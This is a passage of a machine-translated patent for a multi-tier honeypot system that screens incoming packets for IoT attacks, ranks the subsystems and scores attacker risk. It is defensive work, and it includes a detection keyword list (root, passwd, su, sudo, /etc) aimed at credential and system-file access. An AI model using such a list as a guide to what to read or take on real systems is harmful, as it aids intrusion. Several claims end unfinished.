The preset protocol may be set according to needs, for example, the preset protocol includes, but is not limited to: tcp, ssh, sip, http, mqtt, soap, etc.

The access characteristics may include, among other things, the geographical location and host address of the terminal (host) of use of the accessing party, the duration of the access, the number of accesses, the port of the attempted connection (of the induction server), etc. characteristics related to the accessing of the induction server by the accessing party. For each access feature, a specific access feature corresponding to the suspicious user may be set, for example, the suspicious user is a user with the access frequency not less than 100, and so on.

The order of the data screening and logic detection steps is not limited.

Alternatively, in this embodiment, the filtering rule may include a filtering rule set from a keyword dimension, where the keyword is understood as a keyword that may appear in the attack packet, and the keyword may be set manually. After determining the suspicious analytical data packet, more accurate matching can be performed based on the screening rule, and the step of performing attack feature matching on the suspicious analytical data packet based on attack feature information of the attack data packet preset in the screening rule and determining the attack data packet in the access data packet based on the matching result can include:

performing keyword matching on suspicious analysis data packets based on preset attack data packet keywords in the screening rules;

The key words of the attack data packet may be key words with higher occurrence frequency counted from the historical attack data packet, or may be key words related to sensitive operations such as user permission or protocol modification, and the like, and optionally, the key words include but are not limited to: root, passwd, password, su, sudo, admin,/etc/etc. When a key is detected in the payload of an parsed packet, the packet is likely to be a highly suspicious parsed packet.

Optionally, the screening rules can also include screening rules set from the dimension of network attack, and such screening rules include attack characteristics about network attack,

Optionally, the network attack includes, but is not limited to, a vulnerability attack, an attack against an internet of things protocol, and an attack performed by using some general network attack methods, and correspondingly, the screening rule may include a vulnerability feature of a preset vulnerability, an attack feature against an internet of things protocol, an attack feature of a preset attack network method, and so on.

Optionally, the step of determining an attack packet in the access packet based on the high suspicious resolution packet may include:

if the payload of the high-suspicious analysis data packet contains the vulnerability characteristics of preset vulnerabilities in the screening rules; or, the associated content associated with the internet of things protocol in the high-suspicious analytic data packet has attack characteristics aiming at the internet of things protocol and set in the screening rule; or, the data of the data packet is analyzed in a high suspicion mode, and the data has attack characteristics of preset attack network methods set in screening rules;

The preset loopholes can be any existing loopholes, and the internet of things protocol includes but is not limited to related protocols such as MQTT, SOAP and the like.

In this embodiment, for the attack induction subsystem with the real device (i.e., the entity client device), a filtering rule based on the detection dimension of the specific operation page of the real device may also be set, and in this type of filtering rule, specific operation page data of the real device included in the attack data packet may be set. The type and specific content of the specific operation page are not limited, and may be, for example, a management page of a real device, a user page, a data download page, and the like. The specific operation page is a user operation page that is not exposed when the entity client device in the embodiment is exposed in the public network. For example, when the entity client device is exposed in the public network, only the data of the login page is exposed, the user can only access the login page through the public network access attack induction subsystem, and can enter other operation pages such as a management page after logging in the entity client device through account information.

If an access data packet of a user includes data of any specific operation page, and the access data packet is sent without the user logging into the entity client device, the access data packet may be determined as an attack data packet.

Optionally, the present embodiment further includes: if the high-suspicious analysis data packet contains information of the entity client device which is not exposed to the public network, the access data packet corresponding to the high-suspicious analysis data packet can be considered as an attack data packet. Wherein the information not exposed to the public network may include a specific operation page of the physical client device.

In this embodiment, the preset attack network method includes, but is not limited to, a general attack method, such as a web shell attack, an SQL (Structured Query Language ) injection attack, and so on.

In another example, the attack-inducement capability at the attack-inducement subsystem is related to the honeypot technology used by the attack-inducement subsystem, the type, number, disguised services, etc. of the inducement client devices that the subsystem includes. Generally, the more complex the honeypot technology, the more the number of client-side devices is induced, the more the types are abundant, and the more disguised services are, the stronger the attack-inducing capability is. The stronger the challenge inducibility, the earlier the screening order.

In this example, the screening orders of the attack-inducing subsystems are not identical, and may be determined according to the attack-inducing capability of the network subsystem to the attack data packet, and in one example, the step of determining the screening order of each attack-inducing subsystem based on the attack-inducing capability of the attack-inducing subsystem may be performed when the subsystem of the attack-inducing system changes, such as when the subsystem camouflage service changes, and when the client device is induced to change (including deletion, addition, etc.). In the case where the attack-induction subsystem is unchanged, the updating of the screening order may not be performed.

In this embodiment, for different types of attack induction subsystems, the time required for deployment or the desire to deploy and update are different, for example, for an attack induction subsystem deployed based on a low-interaction honeypot technology, the deployment time is shorter, the attack induction can be completed quickly, and the attack induction capability can reach a higher level by itself quickly.

In this embodiment, the deployment duration of the attack induction subsystem implemented by the high-interaction honeypot can be set longer, and some basic server devices such as an induction server and some induction client devices can be deployed first, and then the structure of the attack induction subsystem is gradually increased, so that the induction client devices are increased, and the requirement of the complex attack induction subsystem on the high deployment cost in a short time can be reduced. With the perfection of the attack induction subsystem, the attack induction capability of the attack induction subsystem is gradually increased.

Therefore, in this embodiment, the relative strength of the attack inducement capability of the different attack inducement subsystems may be changed, and the attack inducement capability may be strong, so that the number of the attack data packets received by the attack inducement subsystem may be increased, and considering that one attack user may initiate attacks to a plurality of attack inducement subsystems at the same time, the embodiment may first perform screening of the attack data packet on the attack inducement subsystem with the strong attack inducement capability, and perform screening of the attack data packet on the attack inducement subsystem with the post-screening attack data packet based on the screening result, so as to avoid that access data packets of all the attack inducement subsystems need to be matched with corresponding screening rules, thereby being beneficial to reducing resources required for screening.

The attack inducibility of the attack-inducing subsystem may be determined periodically at time intervals, or when a change (such as a structural change or a disguised service change) of a certain attack-inducing subsystem is detected.

After each determination, the determined attack induction capability can be converted into identification information such as a numerical value which can reflect the strength of the attack induction capability, and then the old identification information of the attack induction subsystem is replaced by the newly determined identification information. In the above step, the identification information of the attack induction subsystem may be read, and the screening sequence of the attack data packets of the attack induction subsystem may be determined according to the identification information. In one example, different attack-inducing subsystems may share a set of screening rules, or the screening rules of different attack-inducing subsystems may be different and may be stored separately according to user settings. Optionally, a correspondence between the screening rules of the attack-inducing subsystem and the identification information may be established, and the screening sequence and the screening rules may be determined simultaneously according to the identification information.

Optionally, the attack induction capability of the attack induction subsystem may be determined according to the honey technology of the attack induction subsystem for the user, the number of service end induction devices and induction client devices contained in the subsystem, disguised services, and the like, optionally, different service end induction devices and induction client devices may set corresponding score values, the same service end induction device may set different score values according to factors such as the size of the same service end induction device, for example, for an induction server, the larger the server (the more computing resources), the larger the score value. Different honeypot technologies can set corresponding score value weighted values, then count the sum of score values, and utilize the score value weighted values to carry out weighted calculation on the sum of score values, wherein the obtained total score value is the identification information of the attack induction capability of the attack induction subsystem.

Wherein, the more complex the honeypot technique, the higher the score weighting value.

It can be understood that when the attack induction system is just deployed, the low-interaction honeypot technology is simple, the deployment speed is high, the number of the induction client devices and the like contained in the attack induction subsystem deployed based on the technology is far greater than that of other attack induction subsystems, the attack induction capability is highest, the attack induction subsystem is gradually perfected along with the time, the attack induction capability is stronger and stronger, and the attack induction capability gradually exceeds that of the attack induction subsystem deployed based on the low-interaction honeypot technology.

In an example, the filtering rule may also be updated along with the updating of the attack induction subsystem, and optionally, the embodiment further includes receiving a filtering rule updating instruction sent by the target attack induction subsystem, where the filtering rule updating instruction includes a newly added filtering instruction, analyzing the newly added filtering rule in the filtering rule updating instruction, storing the newly added filtering rule, and establishing a correspondence between the newly added filtering rule and the identification information of the attack induction capability of the target attack induction subsystem.

205. If the currently screened attack induction subsystem is not arranged at the forefront position in the screening sequence, acquiring a sending user of the screened attack data packet based on the screening result of the screened attack induction subsystem, determining the access data packet sent by the sending user as the attack data packet from the access data packet received by the currently screened attack induction subsystem, and determining the attack data packet in the non-screened access data packet based on the screening rule corresponding to the currently screened attack induction subsystem and the non-screened access data packet of the currently screened attack induction subsystem;

If the currently screened attack guidance subsystem is not the first attack guidance subsystem in the screening order, determining the transmitting user of the attack data packet in the screening result based on the screening result of the attack guidance subsystem before the currently screened attack guidance subsystem, wherein the determined transmitting user can be from the attack data packets of all the attack guidance subsystems of which the screening order is before the currently screened attack guidance subsystem.

If the number of the attack induction subsystems is 3, the number of the attack induction subsystems is A, B, C, the screening sequence is A, C, B, the A screens according to the corresponding screening rules, after the A screening, the sending users (for distinguishing, can be called as first sending users) of the attack data packet of the A are determined according to the screening results, when the access data packet of the C is screened, the access data packet sent by the first sending user is screened out as the attack data packet, then the rest of the access data packets are screened according to the corresponding screening rules, the sending users (for distinguishing, can be called as second sending users) of the attack data packet screened out from the rest of the access data packets are determined, when the B is screened out, the access data packets sent by the first sending user and the second sending user are screened out as the attack data packet, and then the rest of the access data packets are screened according to the corresponding screening rules.

Or in the step of determining the transmitting user of the attack data packet in the screening result based on the screening result of the attack induction subsystem before the currently screened attack induction subsystem in the screening order, the determined transmitting user may include the transmitting user of the attack data packet of the attack induction subsystem in the screening order of the first order.

When the number of the attack induction subsystems is large, the attack induction subsystems are screened sequentially according to the screening sequence, the screening time period may be long, and the fact that the parallel processing capability of the cloud server and the like is high at present is considered, so that a large amount of data can be processed in a short time, the characteristics can be fully utilized, the screening time period is reduced, and the attack data packets are processed as soon as possible.

Optionally, in one example, when determining the currently screened attack-inducing subsystem based on the screening order of each attack-inducing subsystem, only two order bits in the screening order are selected, where the screening order is the first bit with the strongest attack-inducing capability, and the screening order is the second bit with the rest of the attack-inducing subsystems.

In this example, after the attack data packet is screened out from the access data packets of the attack-inducing subsystem with the strongest attack-inducing capability, the access data packets of the remaining attack-inducing subsystem may be screened at the same time.

In this example, the sequence of the parsing steps of the access data packets of the different attack-inducing subsystems may not be affected by the screening sequence, i.e., the access data packets of the different attack-inducing subsystems may parse the corresponding parsed data packets before the attack data packets are screened, and then screen according to the screening sequence and the screening rule.

In another example, when an attack packet needs to be screened, the corresponding packet may be parsed again.

Optionally, the step of determining an attack data packet in the access data packet based on the screening rule corresponding to the currently screened attack-inducing subsystem and the access data packet received by the currently screened attack-inducing subsystem may include:

The specific operation steps of parsing the access data packet, concepts of access behavior feature information, attack feature information, and the like, and a determination process capable of parsing the data packet can be referred to the related description in the foregoing examples, which are not repeated herein.

Optionally, the step of "obtaining access behavior feature information corresponding to the parsed data packet, and determining the suspicious parsed data packet in the parsed data packet based on the access behavior feature information" may include:

if the protocol used for analyzing the data packet is a preset protocol in the screening rule corresponding to the currently screened attack-inducing subsystem, and/or the corresponding access characteristic accords with the specific access characteristic of the suspicious user preset in the screening rule corresponding to the currently screened attack-inducing subsystem, determining that the analyzed data packet is the suspicious analyzed data packet.

The relevant explanation of the preset protocol and the specific access feature refers to the relevant explanation in the foregoing examples, and is not repeated here.

In one example, feature matching is performed on suspicious analysis data packets based on attack feature information of attack data packets preset in a screening rule corresponding to a currently screened attack induction subsystem, and attack data packets in access data packets are determined based on a matching result, which specifically may include: performing keyword matching on suspicious analysis data packets based on preset attack data packet keywords in screening rules corresponding to the currently screened attack induction subsystem; determining the suspicious analysis data packet successfully matched as a high suspicious analysis data packet; and determining an attack data packet in the access data packet based on the high-suspicious analysis data packet.

For explanation of the preset attack packet key, etc., refer to the related description of the foregoing example, and are not repeated herein.

if the payload of the high-suspicious analysis data packet contains the vulnerability characteristics of preset vulnerabilities in the screening rules corresponding to the currently screened attack induction subsystem; and/or, the associated content associated with the internet of things protocol in the high-suspicious analytic data packet has the attack characteristics aiming at the internet of things protocol in the screening rule corresponding to the currently screened attack induction subsystem; and/or, the data of the data packet are analyzed in a high suspicious manner, and the attack characteristics of the attack network method are preset in the screening rules corresponding to the currently screened attack induction subsystem;

Determining an access data packet corresponding to the high-suspicious analysis data packet as an attack data packet

Regarding vulnerability characteristics of the preset vulnerability, attack characteristics of the internet of things protocol gateway, attack characteristics of the preset attack network technique, etc., reference may be made to the related description of the foregoing examples, which is not repeated herein.

If the currently screened attack-inducing subsystem is not the first attack-inducing subsystem in the screening sequence, in the step of determining the attack data packet in the unselected access data packet based on the screening rule corresponding to the currently screened attack-inducing subsystem and the unselected access data packet of the currently screened attack-inducing subsystem, the specific screening scheme is the same as that of the currently screened attack-inducing subsystem when the currently screened attack-inducing subsystem is the first attack-inducing subsystem in the screening sequence, only the attack data packet in the screening scheme of the first attack-inducing subsystem is replaced by the unselected access data packet of the currently screened attack-inducing subsystem, and the screening rule is the screening rule of the currently screened attack-inducing subsystem, and other screening steps are identical, so that the details are omitted.

206. And processing the attack data packet based on the determined attack risk of the attack data packet to the attack induction system.

The attack risk of the attack data packet may be calculated for the attack induction subsystem, and in one example, the determination of the attack risk may be performed based on the data of the single attack data packet, for example, the determination of the attack risk may be performed based on parameters such as a screening rule for hit of the attack data packet.

In another example, the determining of the attack risk may be further performed for all attack data packets of the same sending user, and optionally, based on the determined attack risk of the attack data packet to the attack induction system, processing the attack data packet may include:

according to the information of the sending user of the attack data packet, determining the attack data packet of the same sending user aiming at all attack induction subsystems as a user associated attack data packet of the sending user;

Determining the attack risk of the user associated attack data packet of the same transmitting user according to the number of the user associated attack data packets of the same transmitting user, the number of the attack induction subsystems attacked by the user associated attack data packet, the attack induction capacity and the screening rule of the hit of the user associated attack data packet;

And processing the user associated attack data packet according to the attack risk of the user associated attack data packet of the same transmitting user and the processing mode corresponding to the attack risk.

The number of the user associated attack data packets can be converted into dangerous scores, the number is larger, the dangerous scores are larger, each attack induction subsystem can be provided with corresponding dangerous scores, each screening rule can also be provided with corresponding dangerous scores, identification information corresponding to attack induction capacity can be converted into corresponding dangerous scores, and the attack dangers of the user associated attack data packets of the same sending user can be represented by the sum of the dangerous scores of all the user associated attack data packets of the same sending user.

And if the risk score threshold value is higher than the risk score threshold value, the processing mode of the attack data packet is isolated storage, and the attack data packet stored in the attack induction system and the system where the security management device for accessing the data is located is deleted, wherein storage equipment used by the isolated storage is non-networking equipment.

For attack data packets not above the risk score threshold, they may be stored in an attack data packet database for later use.

Optionally, the embodiment may also analyze and count the attack data packet, generate a statistical report for the user to view, and so on. Optionally, the method of this embodiment may further include: based on the data in the analysis data packet of the attack data packet, acquiring the statistical information of the attack data packet on at least one abnormal flow statistical dimension; based on the statistical information, an abnormal traffic statistics report is generated.

Among the abnormal traffic statistics dimensions include, but are not limited to:

1. attacker ip;

2. An attacker geographical location;

3. An attack port;

4. attack date;

5. the number of attacks;

6. attack the protocol used;

7. attack data payload;

8. vulnerability descriptions utilized by the attack;

9. the attack vulnerability is referred to.

The vulnerability description may include attack behavior of the attack data packet, generated harm, targeted server ports, and the like. Attack vulnerability references descriptions may include provenance of the vulnerability, such as paper name, number of pages, etc.

In one example, after generating the abnormal traffic statistics report based on the statistics information, further comprising:

When an abnormal flow checking instruction sent by the management terminal is received, an abnormal flow statistical report is sent to the management terminal, so that the management terminal displays an abnormal flow checking page based on the abnormal flow statistical report.

Through the abnormal traffic viewing page, the administrative user can perform data query and analysis.

By adopting the embodiment, the access data packet received by at least one induction server in the attack induction system is obtained, wherein the attack induction system comprises at least two attack induction subsystems, and each attack induction subsystem comprises an induction server and at least one induction client device connected with the induction server; according to the attack induction capability of the attack induction subsystem, determining an attack data packet screening scheme of each attack induction subsystem; according to the attack data packet screening scheme corresponding to each attack induction subsystem and the access data packet received by the attack induction subsystem, determining an attack data packet in the access data packet; based on the determined attack danger of the attack data packet to the attack induction system, the attack data packet is processed, so that different attack induction subsystems can attract more kinds of attack behaviors, an induction server in the attack induction system can receive more attack data packets, and the attack data packet is detected pertinently through an attack data packet screening scheme corresponding to each attack induction subsystem, so that a detection result with higher accuracy is obtained, more equipment vulnerabilities can be found, and the safety of the Internet of things industry is improved.

The embodiment also provides an embodiment of the refinement step of the security management method for accessing data, and supposing that the attack induction subsystem in the example comprises three attack induction subsystems, namely an attack induction subsystem A constructed by adopting a high-interaction honeypot technology, an attack induction subsystem B constructed based on a low-interaction honeypot technology and a third attack induction subsystem C, wherein the second attack induction subsystem and the third attack induction subsystem share one induction server.

Referring to fig. 3, the security management method for access data includes:

301. sending an access data packet acquisition request to an induction server of the attack induction subsystem A to C, and receiving an access data packet sent by the induction server in response to the request;

The access data packet obtaining request may carry time information of obtaining the access data packet last time, so as to induce the server to send the access data packet received after the time information according to the time information.

302. Acquiring identification information of attack induction capability of the attack induction subsystems A to C, and determining a screening sequence and a screening rule of the attack induction subsystems A to C based on a mapping relation between the identification information and the screening sequence and the screening rule;

The calculation manner of the identification information refers to the description of the foregoing examples, which is not repeated herein,

In the screening sequence, the attack induction subsystem A is assumed to be in a first sequence, and the attack induction subsystem B and the attack induction subsystem C are in a second parallel sequence. The screening rules of the attack-inducing subsystem a may be the same as or different from the screening rules of the attack-inducing subsystems B and C, and the present embodiment is not limited thereto.

303. The method comprises the steps of obtaining a corresponding analysis data packet (for distinguishing, marked as a first analysis data packet) from an access data packet received by an attack induction subsystem A; based on the data of the first analysis data packet, acquiring a protocol used by the first analysis data packet and acquiring the access characteristic of a sending user of the first analysis data packet;

304. if the protocol of the first analysis data packet is a preset protocol in the screening rule and/or the corresponding access characteristic accords with the specific access characteristic of the suspicious user preset in the screening rule, determining that the first analysis data packet is the suspicious analysis data packet;

305. Performing keyword matching on suspicious analysis data packets based on preset attack data packet keywords in the screening rules; determining the suspicious analysis data packet successfully matched as a high suspicious analysis data packet;

306. If the payload of the high-suspicious analysis data packet contains the vulnerability characteristics of preset vulnerabilities in the screening rules; or, the associated content associated with the internet of things protocol in the high-suspicious analytic data packet has attack characteristics aiming at the internet of things protocol and set in the screening rule; or, the data of the data packet is analyzed in a high suspicion mode, and the data has attack characteristics of preset attack network methods set in screening rules; determining an access data packet corresponding to the high-suspicious analysis data packet as an attack data packet of the attack induction subsystem A;

307. Determining a transmitting user of an attack data packet of the attack induction subsystem A;

308. Determining the data packet sent by the sending user in the access data packets received by the attack induction subsystem B and the attack induction subsystem C as an attack data packet;

309. The residual access data packets of the attack induction subsystems B and C are acquired to obtain corresponding analysis data packets (for distinguishing, marked as second analysis data packets); based on the data of the second analysis data packet, acquiring a protocol used by the second analysis data packet and acquiring the access characteristic of a sending user of the second analysis data packet;

310. If the protocol of the second analysis data packet is a preset protocol in the screening rule and/or the corresponding access characteristic accords with the specific access characteristic of the suspicious user preset in the screening rule, determining that the second analysis data packet is the suspicious analysis data packet;

311. performing keyword matching on suspicious analysis data packets based on preset attack data packet keywords in the screening rules; determining the suspicious analysis data packet successfully matched as a high suspicious analysis data packet;

312. if the payload of the high-suspicious analysis data packet contains the vulnerability characteristics of preset vulnerabilities in the screening rules; or, the associated content associated with the internet of things protocol in the high-suspicious analytic data packet has attack characteristics aiming at the internet of things protocol and set in the screening rule; or, the data of the data packet is analyzed in a high suspicion mode, and the data has attack characteristics of preset attack network methods set in screening rules; determining an access data packet corresponding to the high-suspicious analysis data packet as an attack data packet of the attack induction subsystem B and the attack induction subsystem C;

313. according to the information of the sending user of the attack data packet, determining the attack data packet of the same sending user aiming at all attack induction subsystems as a user associated attack data packet of the sending user;

314. Converting the number of the user associated attack data packets into a first risk score; determining a second risk score of the user association attack data packet according to a risk score corresponding to a preset screening rule and a screening rule in the user association attack data packet; obtaining a third risk score according to preset risk scores corresponding to the identification information of each attack induction subsystem and the attack induction subsystem corresponding to the user associated attack data packet; according to the corresponding relation between the number of the attack induction subsystems and the risk scores and the number of the attack induction subsystems corresponding to the user associated attack data packets, a fourth risk score is obtained, and the first, second, third and fourth risk scores are summed to obtain the sum of the risk scores of all the user associated attack data packets of the same transmitting user;

315. And if the sum of the risk scores is higher than the risk score threshold, performing isolated storage on the attack data packet, and deleting the attack data packet stored in the attack induction system, wherein storage equipment used by the isolated storage is non-networking equipment.

By adopting the embodiment, the attack behaviors with richer types can be attracted through different attack induction subsystems, so that an induction server in the attack induction system can receive more attack data packets, and the attack data packets are pertinently detected through the attack data packet screening schemes corresponding to the attack induction subsystems, so that a detection result with higher accuracy is obtained, more equipment holes can be found, and the security of the Internet of things industry is improved.

To solve the above technical problem, this embodiment further provides a security management device for accessing data, referring to fig. 4, where the security management device for accessing data may include:

A data packet obtaining unit 401, configured to obtain an access data packet received by at least one induction server in an attack induction system, where the attack induction system includes at least two attack induction subsystems, each attack induction subsystem includes an induction server and at least one induction client device connected to the induction server;

A screening scheme determining unit 402, configured to determine a screening order and a screening rule of the attack data packets of each attack induction subsystem according to the attack induction capability of the attack induction subsystem;

A screening object determining unit 403, configured to determine an attack induction subsystem currently screened based on a screening order of each attack induction subsystem;

a first filtering unit 404, configured to determine an attack packet in the access packet based on a filtering rule corresponding to the currently filtered attack-inducing subsystem and an access packet received by the currently filtered attack-inducing subsystem if the currently filtered attack-inducing subsystem is arranged at a forefront position in the filtering sequence;

A second filtering unit 405, configured to, if the currently filtered attack-inducing subsystem is not arranged at a position that is the most forward in the filtering sequence, obtain a sending user of the filtered attack data packet based on a filtering result of the filtered attack-inducing subsystem, determine, from the access data packets received by the currently filtered attack-inducing subsystem, that the access data packet sent by the sending user is an attack data packet, and determine, based on a filtering rule corresponding to the currently filtered attack-inducing subsystem and an unselected access data packet of the currently filtered attack-inducing subsystem, an attack data packet in the unselected access data packet;

And the processing unit 406 is configured to process the attack data packet based on the determined attack risk of the attack data packet on the attack induction system.

A deployment unit for:

In an alternative example, the first screening unit is configured to:

In an alternative example, the screening unit is configured to:

In an alternative example, the processing unit is configured to:

in an alternative example, further comprising: a statistics unit for:

By adopting the embodiment, the induction servers of different attack induction subsystems can be deployed in the public network, the required induction client devices can be deployed in the public network and the target intranet, and different attack induction subsystems can attract more abundant attack behaviors, so that the induction servers in the attack induction system can receive more attack data packets, and more equipment vulnerabilities can be found through detection of the attack data packets, thereby being beneficial to improving the safety of the Internet of things industry.

In addition, the embodiment of the present invention further provides a computer device, which may be a terminal or a server, as shown in fig. 5, which shows a schematic structural diagram of the computer device according to the embodiment of the present invention, specifically:

the computer device may include one or more processing cores 'processors 501, one or more computer-readable storage media's memory 502, a power supply 503, and an input unit 504, among other components. Those skilled in the art will appreciate that the computer device structure shown in FIG. 5 is not limiting of the computer device and may include more or fewer components than shown, or may be combined with certain components, or a different arrangement of components. Wherein:

The processor 501 is the control center of the computer device, connects the various parts of the entire computer device using various interfaces and lines, runs or executes software programs and/or modules stored in the memory 502, and invokes data stored in the memory 502 to perform various functions and process data of the computer device, thereby performing overall monitoring of the computer device. Optionally, processor 501 may include one or more processing cores; preferably, the processor 501 may integrate an application processor that primarily handles operating systems, user interfaces, applications, etc., with a modem processor that primarily handles wireless communications. It will be appreciated that the modem processor may not be integrated into the processor 501.

The memory 502 may be used to store software programs and modules, and the processor 501 runs the software programs and modules stored in the memory 502 to perform various functional applications and data processing. The memory 502 may mainly include a storage program area and a storage data area, wherein the storage program area may store an operating system, an application program (such as a sound playing function, an image playing function, etc.) required for at least one function, and the like; the storage data area may store data created according to the use of the computer device, etc. In addition, memory 502 may include high-speed random access memory, and may also include non-volatile memory, such as at least one magnetic disk storage device, flash memory device, or other volatile solid-state storage device. Accordingly, the memory 502 may also include a memory controller to provide access to the memory 502 by the processor 501.

The computer device further includes a power supply 503 for powering the various components, preferably the power supply 503 is logically connected to the processor 501 by a power management system, such that the power management system performs functions such as managing charging, discharging, and power consumption. The power supply 503 may also include one or more of any of a direct current or alternating current power supply, a recharging system, a power failure detection circuit, a power converter or inverter, a power status indicator, and the like.

The computer device may also include an input unit 504, which input unit 504 may be used to receive input numeric or character information and to generate keyboard, mouse, joystick, optical or trackball signal inputs related to user settings and function control.

Although not shown, the computer device may further include a display unit or the like, which is not described herein. In particular, in this embodiment, the processor 501 in the computer device loads executable files corresponding to the processes of one or more application programs into the memory 502 according to the following instructions, and the processor 501 executes the application programs stored in the memory 502, so as to implement various functions as follows:

The specific implementation of each operation above may be referred to the previous embodiments, and will not be described herein.

Those of ordinary skill in the art will appreciate that all or a portion of the steps of the various methods of the above embodiments may be performed by instructions or by instructions controlling associated hardware, which may be stored on a computer-readable storage medium and loaded and executed by a processor.

To this end, an embodiment of the present invention further provides a storage medium storing a plurality of instructions capable of being loaded by a processor to perform the method for managing security of access data provided by the embodiment of the present invention.

According to one aspect of the present application, there is also provided a computer program product or computer program comprising computer instructions stored in a computer readable storage medium. The processor of the computer device reads the computer instructions from the computer-readable storage medium, and the processor executes the computer instructions, so that the computer device performs the methods provided in the various alternative implementations of the above embodiments.

Wherein the storage medium may include: read Only Memory (ROM), random access Memory (RAM, random Access Memory), magnetic or optical disk, and the like.

The steps in the method for managing access data provided by the embodiment of the present invention can be executed by the instructions stored in the storage medium, so that the beneficial effects that can be achieved by the method for managing access data provided by the embodiment of the present invention can be achieved, and detailed descriptions of the foregoing embodiments are omitted.

The foregoing has described in detail the method, apparatus, computer device and storage medium for securely managing access data provided by the embodiments of the present invention, and specific examples have been applied to illustrate the principles and embodiments of the present invention, and the above description of the embodiments is only for aiding in understanding the method and core idea of the present invention; meanwhile, as those skilled in the art will vary in the specific embodiments and application scope according to the ideas of the present invention, the present description should not be construed as limiting the present invention in summary.

Claims

1. A method of security management of access to data, comprising:

Based on a deployment mode and a system deployment file corresponding to the attack induction subsystem, deploying a server side induction device of the attack induction subsystem in a public network, and deploying an induction client side device of the attack induction subsystem in a corresponding client side end network, wherein the server side induction device comprises an induction server; comprising the following steps: when the attack-induction subsystem includes at least two associated attack-induction subsystems sharing a first induction server; based on the deployment mode of at least one associated attack induction subsystem and a system deployment file, deploying the first induction server in a public network; according to the deployment mode and the system deployment file of each associated attack induction subsystem, deploying other server induction devices except the first induction server in the server induction devices of the associated attack induction subsystems; according to the deployment mode and the system deployment file of each associated attack induction subsystem, deploying induction client equipment of each associated attack induction subsystem in a corresponding client end deployment network;

2. The method according to claim 1, wherein the association attack induction subsystem includes a first attack induction subsystem, and the deploying, according to a deployment manner and a system deployment file of each association attack induction subsystem, an induction client device of each association attack induction subsystem in a corresponding client end network includes:

and simulating a first target protocol required to run the service provided by the client-side-inducing device in the public network.

3. The method according to claim 1, wherein the associated attack-inducing subsystem includes a second attack-inducing subsystem, and the inducing client device for deploying each associated attack-inducing subsystem in the corresponding client end network according to the deployment method and the system deployment file of each associated attack-inducing subsystem includes:

4. The method according to claim 1, wherein when the attack-inducing subsystem includes a third attack-inducing subsystem, the deploying the server-side induction device of the attack-inducing subsystem in the public network and the inducing client-side device of the attack-inducing subsystem in the corresponding client-side deployment network based on the deployment method and the system deployment file corresponding to the attack-inducing subsystem, comprises:

5. The method for securely managing access data according to any one of claims 1 to 4, wherein determining an attack packet in the access packet based on a filtering rule corresponding to the currently filtered attack-inducing subsystem and an access packet received by the currently filtered attack-inducing subsystem comprises:

6. The method for securely managing access data according to claim 5, wherein the obtaining access behavior feature information corresponding to the parsed data packet, and determining suspicious parsed data packets in the parsed data packets based on the access behavior feature information, comprises:

And if the protocol used for analyzing the data packet is a preset protocol in the screening rule corresponding to the currently screened attack induction subsystem, and/or the corresponding access characteristic accords with the specific access characteristic of the preset suspicious user in the screening rule corresponding to the currently screened attack induction subsystem, determining that the analyzed data packet is a suspicious analyzed data packet.

7. The method for securely managing access data according to claim 6, wherein the step of performing feature matching on the suspicious parsed data packet based on attack feature information of attack data packets preset in a screening rule corresponding to the currently screened attack-inducing subsystem, and determining attack data packets in the access data packet based on a matching result, includes:

8. The method for securely managing access data according to claim 7, wherein said determining an attack packet in said access packet based on said high-suspicious parsed packet comprises:

9. The method for security management of access data according to any one of claims 1 to 4, wherein the processing the attack data packet based on the determined attack risk of the attack data packet to the attack induction system includes:

And processing the user associated attack data packet according to the attack risk of the user associated attack data packet of the same transmitting user according to a processing mode corresponding to the attack risk.

10. A security management apparatus for accessing data, comprising:

the deployment unit is used for acquiring a system deployment file of the attack induction subsystem in the attack induction system; the attack induction subsystem comprises at least two associated attack induction subsystems sharing a first induction server; based on the deployment mode of at least one associated attack induction subsystem and a system deployment file, deploying the first induction server in a public network; according to the deployment mode and the system deployment file of each associated attack induction subsystem, deploying other server induction devices except the first induction server in the server induction devices of the associated attack induction subsystems; the server side induction equipment comprises an induction server; according to the deployment mode and the system deployment file of each associated attack induction subsystem, deploying induction client equipment of each associated attack induction subsystem in a corresponding client end deployment network;

11. A computer device, the computer device comprising: a memory, a processor and a computer program stored on the memory and executable on the processor, wherein the processor implements the method of any one of claims 1-9 when the computer program is executed.

12. A storage medium having stored thereon a computer program which, when run on a computer, causes the computer to perform the steps of the method according to any of claims 1-9.